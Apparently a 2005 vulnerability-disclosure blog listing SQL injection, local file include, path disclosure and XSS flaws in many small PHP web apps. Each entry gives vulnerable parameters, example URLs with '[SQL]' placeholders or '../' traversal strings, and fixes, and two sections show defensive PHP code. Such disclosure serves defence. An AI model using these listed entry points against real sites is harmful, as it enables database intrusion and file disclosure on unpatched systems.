by r0t, der4444, cembo, VietMafia

Wednesday, November 30, 2005

Instant Photo Gallery SQL inj. vuln.

Vuln. discovered by: r0t
Date: 30 nov. 2005
Vendor: http://www.instantphotogallery.com
Affected version: v1 and prior

Product Description:
Instant Photo Gallery is a new website authoring and gallery management system developed by a photographer for photographers. Unlike other free gallery software systems out there, IPG doesn't bog you down with lots of non-professional features like slideshows, image ratings, or comments. No "member gallery" management and permissions features. No complicated configurations or multiple templating systems.
There's nothing wrong with gallery systems like Coppermine and Gallery. We think they're great, and use them for many of our projects. However, they can be overkill and lack the professional simplicity needed for the fast development and customization of a professional photographer or model website.
If you need an elegant solution that allows you to create the kind of site that most professionals need, download Instant Photo Gallery and give it a try, it's FREE!

Vuln. Description:
Input passed to the "cat_id" parameter in "portfolio.php" and "cid" parameter in "content.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/portfolio.php?cat_id=[SQL]
/content.php?cid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

phpAlbum Local file include vuln.

Vuln. discovered by: r0t
Date: 30 nov. 2005
Vendor: http://www.phpalbum.net/
Affected version: v0.2.3 and prior

Product Description:
It is an easy to install and run PHP Photo Album/Gallery script. No database required. Caching, password directory protection, logs, automatic thumbnail generation and caching ... new features coming soon, themes support and others ...

Vuln. Description:
PHPalbum is prone to a local file include vulnerability. This is due to a lack of proper sanitization of user-supplied input.
This may facilitate the unauthorized viewing of files and unauthorized execution of local PHP code.

example:
/main.php?cmd=../
/main.php?cmd=album&var1=../

Solution:
Edit the source code to ensure that input is properly sanitised.

Tuesday, November 29, 2005

O-Kiraku Nikki v1.3 SQL inj. vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://www.ag0ny.com/okiraku.php
Affected version: v1.3 and prior

Product Description:
'O-Kiraku Nikki' is Japanese for 'A Nice Calendar'. It is a simple PHP program that displays a calendar on a Web site, with the ability to add as many annotations as desired to any day, and have these annotations displayed on a Web page. It can be used as a diary, a Weblog, or a scheduler, etc. It comes with full multilanguage (Unicode) support, and includes by default English, Japanese, German, Spanish, Swedish, Italian and Dutch translations. It has been designed with both security and simplicity in mind.

Vuln. description:
Input passed to the "day_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/okiraku.php?lang=&day_id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

88Script's Event Calendar v2.0 SQL inj. vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://www.88scripts.com/
Affected version: v2.0 and prior

Product Description:
A simple yet elegant event calendar. Easy to use and simple to configure. Makes event recording and display such a simple task. Bug fix on event search, also added a way to delete event. Version 2.0 includes an admin section to enable or disable HTML entries. Also you have an option to set the calendar to be public or private. Event queueing is also incorporated where event listings need approval before appearing on the calendar.

Vuln. description:
Input passed to the "m" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?d=28&m=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Calendar Express 2 SQL inj. vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: www.phplite.com/products/calendarexpress/index.php
Affected version: 2.2 and prior

Product Description:
Calendar Express 2 is a comprehensive and robust web based calendar and event publishing system ideal for large organizations, internet portals, educational institutions and corporate intranets. The feature packed product supports unlimited number of categories and calendars and comes with an intuitive, easy to use interface. Other features include My Events control panel, synchronization with Outlook and Palm, multiple style pack support and a lot more.

Vuln. description:
Input passed to the "cid" and "catid" parameters in "day.php", "week.php", "month.php" and "year.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/day.php?cid=[SQL]
/day.php?cid=&catid=[SQL]

/week.php?cid=&catid=[SQL]
/week.php?cid=[SQL]

/month.php?cid=&catid=[SQL]
/month.php?cid=[SQL]

/year.php?cid=&catid=[SQL]
/year.php?cid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Jax Calendar 1.34 vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://www.jtr.de/scripting/php/calendar/index_eng.html
Affected version: 1.34 and prior

Product Description:
Jax Calendar is an online calendar management tool that supports multiple data sources (MySQL AND/OR CSV textfile chooseable), different languages (currently English, German, Hungarian), different views (day, month, year), easy to customize via CSS, user-friendly admin frontend and detailed installation manual.

Vuln. description:
Input passed to the "cal_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/jax_calendar.php?Y=2005&m=11&d=15&cal_id=[SQL]

Also, input passed to the "Y" and "m" parameters isn't properly sanitised before being used in a SQL query. As I tested I got a system overload, so I can't say directly which kind of attack can be used.

Solution:
Edit the source code to ensure that input is properly sanitised.

Codewalkers ltwCalendar 4.x SQL inj. vuln

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://calendar.codewalkers.com/
Affected version: v4.1.3 and prior

Product Description:
ltwCalendar is an event calendar programmed in PHP and currently uses mySQL as a database backend. With ltwCalendar, you can add single events or recurring events. Everything is in a very customizable layout and should be very easy to integrate with your site. Do keep in mind though that my initial intent was to never release this code into the wild. I was just making this for a personal project. After I got done with it however I decided I would give it to the world.

Vuln. description:
Input passed to the "id" parameter in "calendar.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/calendar.php?display=event&id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Survey System 1.1 SQL inj. vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://ilyav.net/?q=node/22
Affected version: 1.1 and prior

Product Description:
This extremely detailed Survey application has been developed as a senior project in the CIS program at UNF under Dr. Solano. It was developed for the Advising Department but to this day has not been implemented on their website due to lack of funds.
With Dr. Solano’s and my coauthors’ permission I am making this program available under the GPL license. The Survey system requires MySQL and PHP to run.

Vuln. description:
Input passed to the "SURVEY_ID" parameter in "survey.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/survey.php?SURVEY_ID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

FAQ System 1.1 SQL inj. vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://ilyav.net/?q=node/23
Affected version: 1.1 and prior

Product Description:
This extremely detailed Frequently Asked Questions application has been developed as a senior project in the CIS program at UNF under Dr. Solano. It was developed for the Advising Department but to this day has not been implemented on their website due to lack of funds.


Vuln. description:
Input passed to the "FAQ_ID", "action" and "CATEGORY_ID" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/viewFAQ.php?action=edit&FAQ_ID=[SQL]
/viewFAQ.php?action=[SQL]
/index.php?SEARCH_KEYS=&CATEGORY_ID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

phpWTF Full Path Disclosure vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://retran.com/phpWTF/
Affected version: v0.2.3 and prior

Product Description:
The phpWTF project: when you don't know what others may not know. phpWTF provides a clean interface for a moderated question and answer forum. The HTML interface is customizable, and with fully W3C compliant output, stylesheets can be used without a problem to customize look & feel.

Vuln. description:
Input passed to the "show" parameter isn't properly sanitised before being used in a SQL query, which may be exploited by attackers to determine the installation path and maybe more :)

example:
/?show=../

Solution:
Edit the source code to ensure that input is properly sanitised.

Orca Ringmaker SQL inj. vuln

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://www.greywyvern.com/orca#ring
Affected version: 2.3c and prior

Product Description:
The Orca Ringmaker allows you to host a full-featured webring on your site using PHP and MySQL. Many intuitive options and controls allow you to easily set up your ring just the way you want.

Vuln Description:
Input passed to the "start" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/ringmaker?start=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Orca Blog SQL inj. vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://www.greywyvern.com/orca#blog
Affected version: 1.3b and prior


Product Description:
The Orca Blog is a free and simple blogging system built from the Orca Forum code. Simple to install and style to fit your existing website, now there's no need to have a whole different section of your site for your blogging script. Create a blog that fits your website instead!

Vuln Description:
Input passed to the "msg" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/blog?msg=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Orca Knowledgebase SQL vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://www.greywyvern.com/orca#know
Affected version: 2.1b and prior

Product Description:
The Orca Knowledgebase is the simplest way to create and manage a knowledgebase or FAQ of questions and answers, organized by category and subcategory. The script comes of age in version 2.0 with many intuitive features, improved administration and full-featured search functions. A separate stylesheet provides easy visual customization. Both the User GUI and Control Panel layouts have been completely redesigned for speed and ease of use. Hosting and managing a comprehensive knowledgebase has never been this easy!

Vuln. description:
Input passed to the "qid" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/knowledgebase?qid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

KBase Express SQL inj. vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://www.sensationdesigns.com/products/scripts/kbase_express/
Affected version: 1.0.0 and prior

Product Description:
KBase Express is a very robust knowledge base manager. Managing your articles or your entire support area has never been so easy! Features include: unlimited categories/subcategories, glossary, unlimited themes, rating system, commenting, WYSIWYG editor, unlimited admins, and much more! It is completely web-based, so you can manage your knowledge base at any time from anywhere!


Vuln. description:
Input passed to the "id" parameter in "category.php" and search parameters in "search.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/category.php?action=view&id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Monday, November 28, 2005

SocketKB 1.1.x Vuln.

Vuln. discovered by: r0t
Date: 29 nov. 2005
Vendor: http://www.socketkb.com
Affected version: 1.1.0 and prior

Product Description:
Deploy a fast, powerful and professional knowledge base on your website. Setup in minutes. Give your customers answers to their problems fast! Reduce support resources and time significantly. Feature rich, flexible and easy to manage. Support unlimited users, categories, articles and attachments. Allow you to create unlimited user groups. Fast category listing engine, tested with over 1300 categories. You have total control. Knowledge base can be restricted to Members Only or open to public. Option to allow access to specific category for certain groups. Great design, allow you to set icons to categories and articles. Visitor may post comments, questions and rate articles. Powerful WYSIWYG editor for you to create articles. Support unlimited and multiple level of administrators. SocketKB empowers you with the right tools.

Vuln. description:

1. Input passed to the "node" and "art_id" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/?__f=category&node=[SQL]
/?__f=rating_add&art_id=[SQL]

2. Input passed to the "__f" parameter isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from local resources.

Successful exploitation requires that "magic_quotes_gpc" is disabled.


Solution:
Edit the source code to ensure that input is properly sanitised.
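The phpAlbum entry above ("cmd" and "var1") and SocketKB item 2 ("__f") both describe a request parameter that is turned into a file path or include target without verification, and both close with "edit the source code to ensure that input is properly sanitised". The following is an added example of what that edit looks like in PHP; it is not code from phpAlbum, SocketKB or these advisories, and the page names, directory names and `pages/` layout are assumptions for illustration. The fix maps the parameter to a fixed allowlist and then confines the resolved path with realpath(), so it does not depend on magic_quotes_gpc at all.

```php
<?php
// Added example (not code from phpAlbum, SocketKB, or the advisories above).
// Hardened dispatch for a "which page/file to load" parameter such as
// phpAlbum's "cmd"/"var1" or SocketKB's "__f". Paths and names are assumptions.

declare(strict_types=1);

// --- Vulnerable pattern the advisories describe (do not use) ---
// include $_GET['__f'] . '.php';   // "../" sequences or any local .php file

/**
 * Resolve a page name to a file through a fixed allowlist.
 * Anything not in the map (including "../", absolute paths, null bytes)
 * is rejected before it ever reaches include(). Independent of magic_quotes_gpc.
 */
function resolvePage(string $requested, string $baseDir): ?string
{
    static $pages = [
        'category'   => 'pages/category.php',
        'article'    => 'pages/article.php',
        'rating_add' => 'pages/rating_add.php',
    ];
    if (!isset($pages[$requested])) {
        return null;
    }
    $path = realpath($baseDir . '/' . $pages[$requested]);
    $base = realpath($baseDir);
    // Defence in depth: even a mis-edited allowlist must not escape $baseDir.
    if ($path === false || $base === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Validate an album directory name the way a "var1"-style parameter should be:
 * a single path component of safe characters, then confined with realpath().
 */
function resolveAlbumDir(string $name, string $albumsRoot): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;   // rejects "../", "/", "\0", spaces and encoding tricks
    }
    $dir  = realpath($albumsRoot . '/' . $name);
    $root = realpath($albumsRoot);
    if ($dir === false || $root === false
        || strpos($dir, $root . DIRECTORY_SEPARATOR) !== 0 || !is_dir($dir)) {
        return null;
    }
    return $dir;
}

// Front controller: unknown or malformed page names get a 404, not an include().
$requested = isset($_GET['__f']) && is_string($_GET['__f']) ? $_GET['__f'] : 'category';
$page = resolvePage($requested, __DIR__);
if ($page === null) {
    http_response_code(404);
    exit('unknown page');
}
require $page;
```

The allowlist is the actual control; the realpath() prefix check only guards against a future maintainer adding a bad entry to the map. A 404 for anything outside the allowlist also gives a web server log line to alert on, since legitimate clients never request names that are not in the map.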

Softbiz B2B trading Marketplace Script SQL inj.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: www.softbizscripts.com/b2b-trading-marketplace-script-features.php
Affected version: 1.1 and prior

Product Description:
Our B2B trading Marketplace Script is a wonderful solution to launch your own global trading site like well known alibaba.com. Just perfect to launch your own top quality trading portal. It is a COMPLETE SCRIPT with quality features like Product Catalog, Company profiles, Sell Offers, Buy Offers, Complete internal messaging, Three membership levels : Gold, Silver and Bronze.


Vuln. description:
Input passed to the "cid" parameter in "selloffers.php", "buyoffers.php", "products.php" and "profiles.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:
/selloffers.php?cid=[SQL]
/buyoffers.php?cid=[SQL]
/products.php?cid=[SQL]
/profiles.php?cid=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

SoftBiz FAQ Script Multiple SQL vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://www.softbizscripts.com/FAQ-script-features.php
Affected version: 1.1 and prior

Product Description:
Our FAQ Script reduces the burden of replying to similar/repetitive queries. It can also be used as a collection of articles. FEATURES: multilevel categories; stats; Customizable colors, fonts, styles; create and save new color schemes and icon sets. Admin can post attachments and specify related articles. Visitors can comment upon, rate, print, refer or discuss articles. WYSIWYG editor for posting HTML formatted articles.

Vuln. description:
Input passed to the "id" parameter in "faq_qanda.php", "refer_friend.php", "print_article.php" and "add_comment.php", and to the "cid" parameter in "index.php", isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?cid=[SQL]
/faq_qanda.php?id=[SQL]
/refer_friend.php?id=[SQL]
/print_article.php?id=[SQL]
/add_comment.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

WSN Knowledge Base SQL inj. vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://scripts.webmastersite.net/wsnkb/
Affected version: 1.2.0 and prior

Product Description:
All pages (even admin panel) entirely customizable via the template system. Add custom templates, change where users are sent on redirects after actions, add new fields (and make them searchable). Use file attachments (as many as needed), show thumbnails of images. Member system can integrate with forums and other mysql. Advanced usergroup permissions. Visitors may rate, email, save, and discuss each article. Search engine friendly URLs option and static HTML file generation.

Vuln. description:
Input passed to the "catid", "perpage", "ascdesc" and "orderlinks" parameters in "index.php", and to the "id" parameter in "comments.php" and "memberlist.php", isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/index.php?action=displaycat&catid=1[SQL]

/index.php?todo=orderlinks&action=displaycat&catid=1&orderlinks=id&ascdesc=desc&perpage=1[SQL]

/index.php?todo=orderlinks&action=displaycat&catid=1&orderlinks=id&ascdesc=1[SQL]

/index.php?todo=orderlinks&action=displaycat&catid=1&orderlinks=[SQL]

/comments.php?id=[SQL]

/memberlist.php?action=profile&id=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

FaqRing 3.0 SQL inj. vuln.

FAQSystems Free Knowledgebase "id" SQL inj. vuln.
Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://faqsystems.com/
Affected version: 3.0 and prior

Product Description:

FaqRing is a free knowledge base application developed to be quickly integrated into any web site, allowing end users to post questions, and administrators to quickly answer the question and publish it to the end users for reference, or remove the question from the knowledge base.


Vuln. description:
Input passed to the "id" parameter in "answer.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:

/answer.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

AltantisFAQ SQL inj. vuln.

Atlantis GPL Knowledge Base Software SQL inj. vuln.
Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://atlantisfaq.com/
Affected version: 3.0 and prior

Product Description:

Atlantis FAQ (AltantisFAQ) Free Knowledge Base FAQ Software. Atlantis Knowledge base is an easy to use, customizable PHP driven web application aimed at providing organizations with the ability to generate text rich documents through a WYSIWYG interface. Publishers register and then create documents. Documents then can be searched, or display the most recent 10 documents which were submitted to the KB. You may also view all of the documents at once in the knowledge base. This application is highly customizable, and totally free.

Vuln. description:

Input parameters in "search.php" aren't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

Omnistar KBase SQL inj. vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://www.omnistarkbase.com/
Affected version: 4.0 and prior

Product Description:
Omnistar KBase is a dynamic knowledgebase management system that allows you to create a repository of searchable and useful information for your web site visitors. It comes feature packed with many dynamic functions such as an optional FAQ section, a customizable user interface, a user feedback section, a built in glossary feature for word definitions and much more! It can be easily installed in minutes on any Linux server or hosted on our servers through our hosted option.

Vuln. description:
Input passed to the "article_id" parameter in "comments.php" and to the "category_id" and "id" parameters in "kb.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/users/comments.php?article_id=[SQL]
/users/kb.php?category_id=[SQL]
/users/kb.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Enterprise Connector SQL inj. vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://www.enterpriseheart.com/site/modules/news/
Affected version: 1.0.2 and prior

Vuln. description:
Input passed to the "messageid" parameter in "send.php" and "messages.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/send.php?messageid=[SQL]
/messages.php?action=delete&messageid=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Zainu 2.x SQL inj. vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://www.zainu.com
Affected version: 2.x and prior


Product Description:

Zainu lets you create and maintain a professional music videos website, simply the best software for excellent websites! It uses a database to store videos and songs. Zainu can add/remove songs to playlists, mail a song, search by artist/albums/songs, download option for songs, add/approve/delete lyrics, rate songs and albums, view songs times played, buy song or buy album, multiple songs can be added at once from the admin control panel! It supports all audio formats ram/rpm/rm/wav/mp3/wma/asf... you and your users can create unlimited playlists and save your favorite songs to any of your created playlists. You can show top songs, top albums, top artists, top genres, top songs by genres, members playlist, view 5 new searches, play selected, play all, playlist creator, embedded player with songs/album/artist information with album/artist covers! Your users can upload multiple songs, artist/albums gallery! Completely Automatic Update Music Videos system. New Version features Shopping Cart, Artist/Album Gallery!


Vuln. description:
Input passed to the "term" and "start" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.



example:
/index.php?in=song&term=[SQL]&action=search&start=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Babe Logger V2 Sql inj. vuln.

Babe Logger V2
Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://13scripts.com/
Affected version: V2 and prior

Product Description:
This script is geared towards babe blog type sites but can be used for any kind of link and/or image listing site imaginable. Whether it be a link dump site, tgp site, media site, etc, this script will do it, see the demos on the script below this one for more examples, you are not limited to these demos, they are just examples of what you can do with the script, and you can create your own setup. The script works on a template system and is 100% customizable. Only basic HTML knowledge is needed to change the look of the entire script, each demo was created in under 5 minutes. Takes about 30 seconds to fully install.

Vuln. description:
Input passed to the "gal" parameter in "index.php" and the "id" parameter in "comments.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.php?gal=[SQL]
/comments.php?id=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Top Music module for PHP Nuke SQL inj. vuln

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://www.sergids.com/
Affected version: 3.0 PR3 and prior

Product Description:
This is a module for PHPNuke that allows you to build an interactive music portal without technical knowledge. Artists, bands, lyrics, songs, audio tracks... Features: :: A-Z list of Bands :: Bands information (Name, genre, biography...) :: Bands' Albums list :: Album information (Title, year, band...) :: Album's Songs list :: Song information (Title, album, number...) :: Listen to sample songs :: Bands, Albums and Songs searching :: Tops listing :: Multilanguage :: Easy installation and configuration :: Themes. Latest version: 3.0PR3. Stable version: 3.0PR2. CVS version: 3.0PR3. Now there is version 3.0 under development with a new module called Top Music Submitter which will allow user submissions. Version 3.0 Pre-Release 3 is an adaptation for Top Music Submitter currently under development. In addition, we have included some features that will be available in version 3.0 final.


Vuln. description:
Input passed to the "idartist", "idsong" and "idalbum" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/modules.php?name=topMusic&op=artist&idartist=[SQL]
/modules.php?name=topMusic&op=song&idartist=1&idalbum=1&idsong=[SQL]
/modules.php?name=topMusic&op=song&idartist=1&idalbum=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

BedengPSP sql inj. vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://www.bedeng.com
Affected version: 1.1 and prior

Product Description:
BedengPSP is a Web portal system based on PHP and MySQL. Features: content management, download manager, user manager, theme builder, layout management and more. Written in Indonesian.

Vuln. description:
Input passed to the "ckode" parameter in "baca.php", to "a.ngroup" in "download.php" and to "a.nsub" in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/baca.php?ckode=[SQL]
/download.php?cwhere=a.ngroup=[SQL]
/index.php?cwhere=a.nsub=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

Geeklog 1.4.x Full Path Disclosure vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://www.geeklog.net/
Affected version: 1.4.0 Beta 1 and prior

Product Description:
Geeklog is a Web Portal System for any webmaster. Set it up as a storytelling software, News system, online community or whatever you want your site to be. Each user can submit comments to discuss the articles, similar to Slashdot, only faster and more secure. Features: web based admin, surveys, top page and access stats, user customizable box, friendly admin GUI, option to edit or delete stories, moderation system, customizable HTML blocks, user password encryption and retrieval, search engine, backend/headlines generation, and more. Written 100% in PHP, requires Apache, PHP and MySQL. The over-riding development philosophy for the software is performance, privacy and security.

Vuln. description:
Input passed to the "datestart" and "dateend" parameters in "search.php" isn't properly sanitised before being used in a SQL query, which may be exploited by attackers to determine the installation path and maybe more :)

example:
/search.php?query=&keyType=phrase&datestart=%3Cscript%3Er0t&dateend=%3Cscript%3Er0t&topic=0&type=all&author=0&results=10&mode=search

Solution:
Edit the source code to ensure that input is properly sanitised.
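The phpWTF entry ("show") and the Geeklog entry above ("datestart"/"dateend") are both full path disclosures: a malformed value reaches code that fails, and PHP prints the failure, including the absolute path of the script, into the response. The block below is an added example written for this page, not code from Geeklog, phpWTF or these advisories; the function names and the date-range shape are assumptions. It shows the two complementary fixes: keep PHP error output off the page and in the log, and validate a date parameter strictly enough that a value like the advisory's `%3Cscript%3Er0t` never reaches the query code.

```php
<?php
// Added example (not code from Geeklog, phpWTF, or the advisories above).
// Two defences against full path disclosure: error output never goes to the
// page, and parameters such as "datestart"/"dateend" are validated before use.
// Function and file names are assumptions.

declare(strict_types=1);

// php.ini / .htaccess equivalents: display_errors=Off, log_errors=On, error_log=<path>
ini_set('display_errors', '0');
ini_set('log_errors', '1');
error_reporting(E_ALL);

// Turn warnings and notices into exceptions so nothing can print
// "... in /var/www/html/search.php on line 42" into the HTML.
set_error_handler(function (int $no, string $str, string $file, int $line) {
    throw new ErrorException($str, 0, $no, $file, $line);
});

// One generic response for every uncaught failure; details go to the log only.
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf('[%s] %s at %s:%d', get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    http_response_code(500);
    echo 'An internal error occurred.';
});

/**
 * Accept only YYYY-MM-DD that is also a real calendar date; return null otherwise.
 * Both "<script>r0t" (the advisory's value) and "2005-02-30" are rejected.
 */
function validDate(?string $value): ?string
{
    if ($value === null || !preg_match('/\A(\d{4})-(\d{2})-(\d{2})\z/', $value, $m)) {
        return null;
    }
    return checkdate((int)$m[2], (int)$m[3], (int)$m[1]) ? $value : null;
}

$start = validDate(isset($_GET['datestart']) && is_string($_GET['datestart']) ? $_GET['datestart'] : null);
$end   = validDate(isset($_GET['dateend'])   && is_string($_GET['dateend'])   ? $_GET['dateend']   : null);
if ($start === null || $end === null || $start > $end) {
    http_response_code(400);
    exit('Invalid date range.');   // no stack trace, no path, no echo of the input
}
// $start and $end are now safe to bind as prepared-statement parameters.
```

Validation alone is not enough: some other code path will eventually fail on unexpected input, and the display_errors setting decides whether that failure leaks the install path. Conversely, hiding errors alone leaves the underlying bad query in place, so both halves belong in the fix.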

Nephp Publisher v4.5.x SQL inj. vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: www.nelogic.com/cms/07-11-2005/19-nephp-publisher.html
Affected version: v4.5.2 and prior

Product Description:
A perfect solution for web publishing like an online magazine or media websites. It also works as a Content Management System that is easy to install and manage. It works as a core application and lets you develop your own desired website. By modifying its templates, nephp can become multi-purpose software. For example: News Publishing, Product Reviews, Content Manager System (CMS), Lyric Engine, etc ....


Vuln. description:
Input passed to the "id" and "nnet_catid" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/index.html?m=comments&id=[SQL]
/index.html?m=show&id=1[SQL]
/index.html?m=search&opt=search_proceed&keywords=175&nnet_uid=1&nnet_catid=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

Softbiz Resource Repository Script SQL vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: www.softbizscripts.com/resource-repository-script-features.php
Affected version: 1.1 and prior


Product Description:
Softbiz Resource Repository Script is an extensive and powerful script written in PHP. It is a quick way to start your own top quality resource repository site like hotscripts.com, resourceindex.com etc. FULLY customizable colors and graphics of the site make this script VERY SPECIAL. It has the potential to generate very heavy revenues for you. The script is built with a focus on increasing ease of use for users and profits for webmasters.


Vuln. description:
Input passed to the "sbres_id" parameter in "details_res.php", "refer_friend.php" and "report_link.php", and to the "sbcat_id" parameter in "showcats.php", isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:
/details_res.php?sbres_id=[SQL]
/showcats.php?sbcat_id=[SQL]
/refer_friend.php?sbres_id=1[SQL]
/report_link.php?sbres_id=1[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

SourceWell SQL inj. vuln.

Vuln. discovered by: r0t
Date: 28 nov. 2005
Vendor: http://sourcewell.berlios.de/html/
Affected version: 1.1.3 and prior

Product Description:
SourceWell is a highly configurable software announcement and retrieval system entirely written in PHP and based upon a MySQL database. It includes a user authentication and authorization system (anonymous/user/editor/admin), sessions with and without cookies, high configurability, multilingual support, ease of administration, an RDF-type document backend, advanced statistics, announcement mailing lists, application indexing by sections, installation support and many other useful features.

Vuln. description:
Input passed to the "cnt" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?start=2005-11-28&days=1&cnt=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

AllWeb search SQL inj. vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.scripts-templates.com
affected version: 3.0 and prior

Product Description:
Want to make money from your site traffic? AllWeb search allows you to search in web, images, news, video, audio and whopping categories. You can put XML based ads on the top, right side and bottom of the search results page. In the admin panel you can see monthly search statistics for each keyword sequence. You can also change your ads display style, ads count and add a new ads server.

Vuln. description:
Input passed to the "search" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

example:
/index.php?search=[SQL]&type=web

Solution:
Edit the source code to ensure that input is properly sanitised.

SearchFeed Search Engine XSS vuln.

Vuln. discovered by : r0t
Date: 28 nov. 2005
Vendor:http://www.wwwsearchsolutions.com/searchfeed.php
affected version:v1.3.2 and prior

Product Description:
Using this script you can be running your own pay per click site in just a few minutes. Best of all it's FREE! SearchFeed Search Engine is one of the best ways to make use of the SearchFeed pay per click search engine affiliate program. SearchFeed Search Engine only takes a minute to configure: upload your files, enter your SearchFeed account ID, tracking ID and site title, and you are up and running.
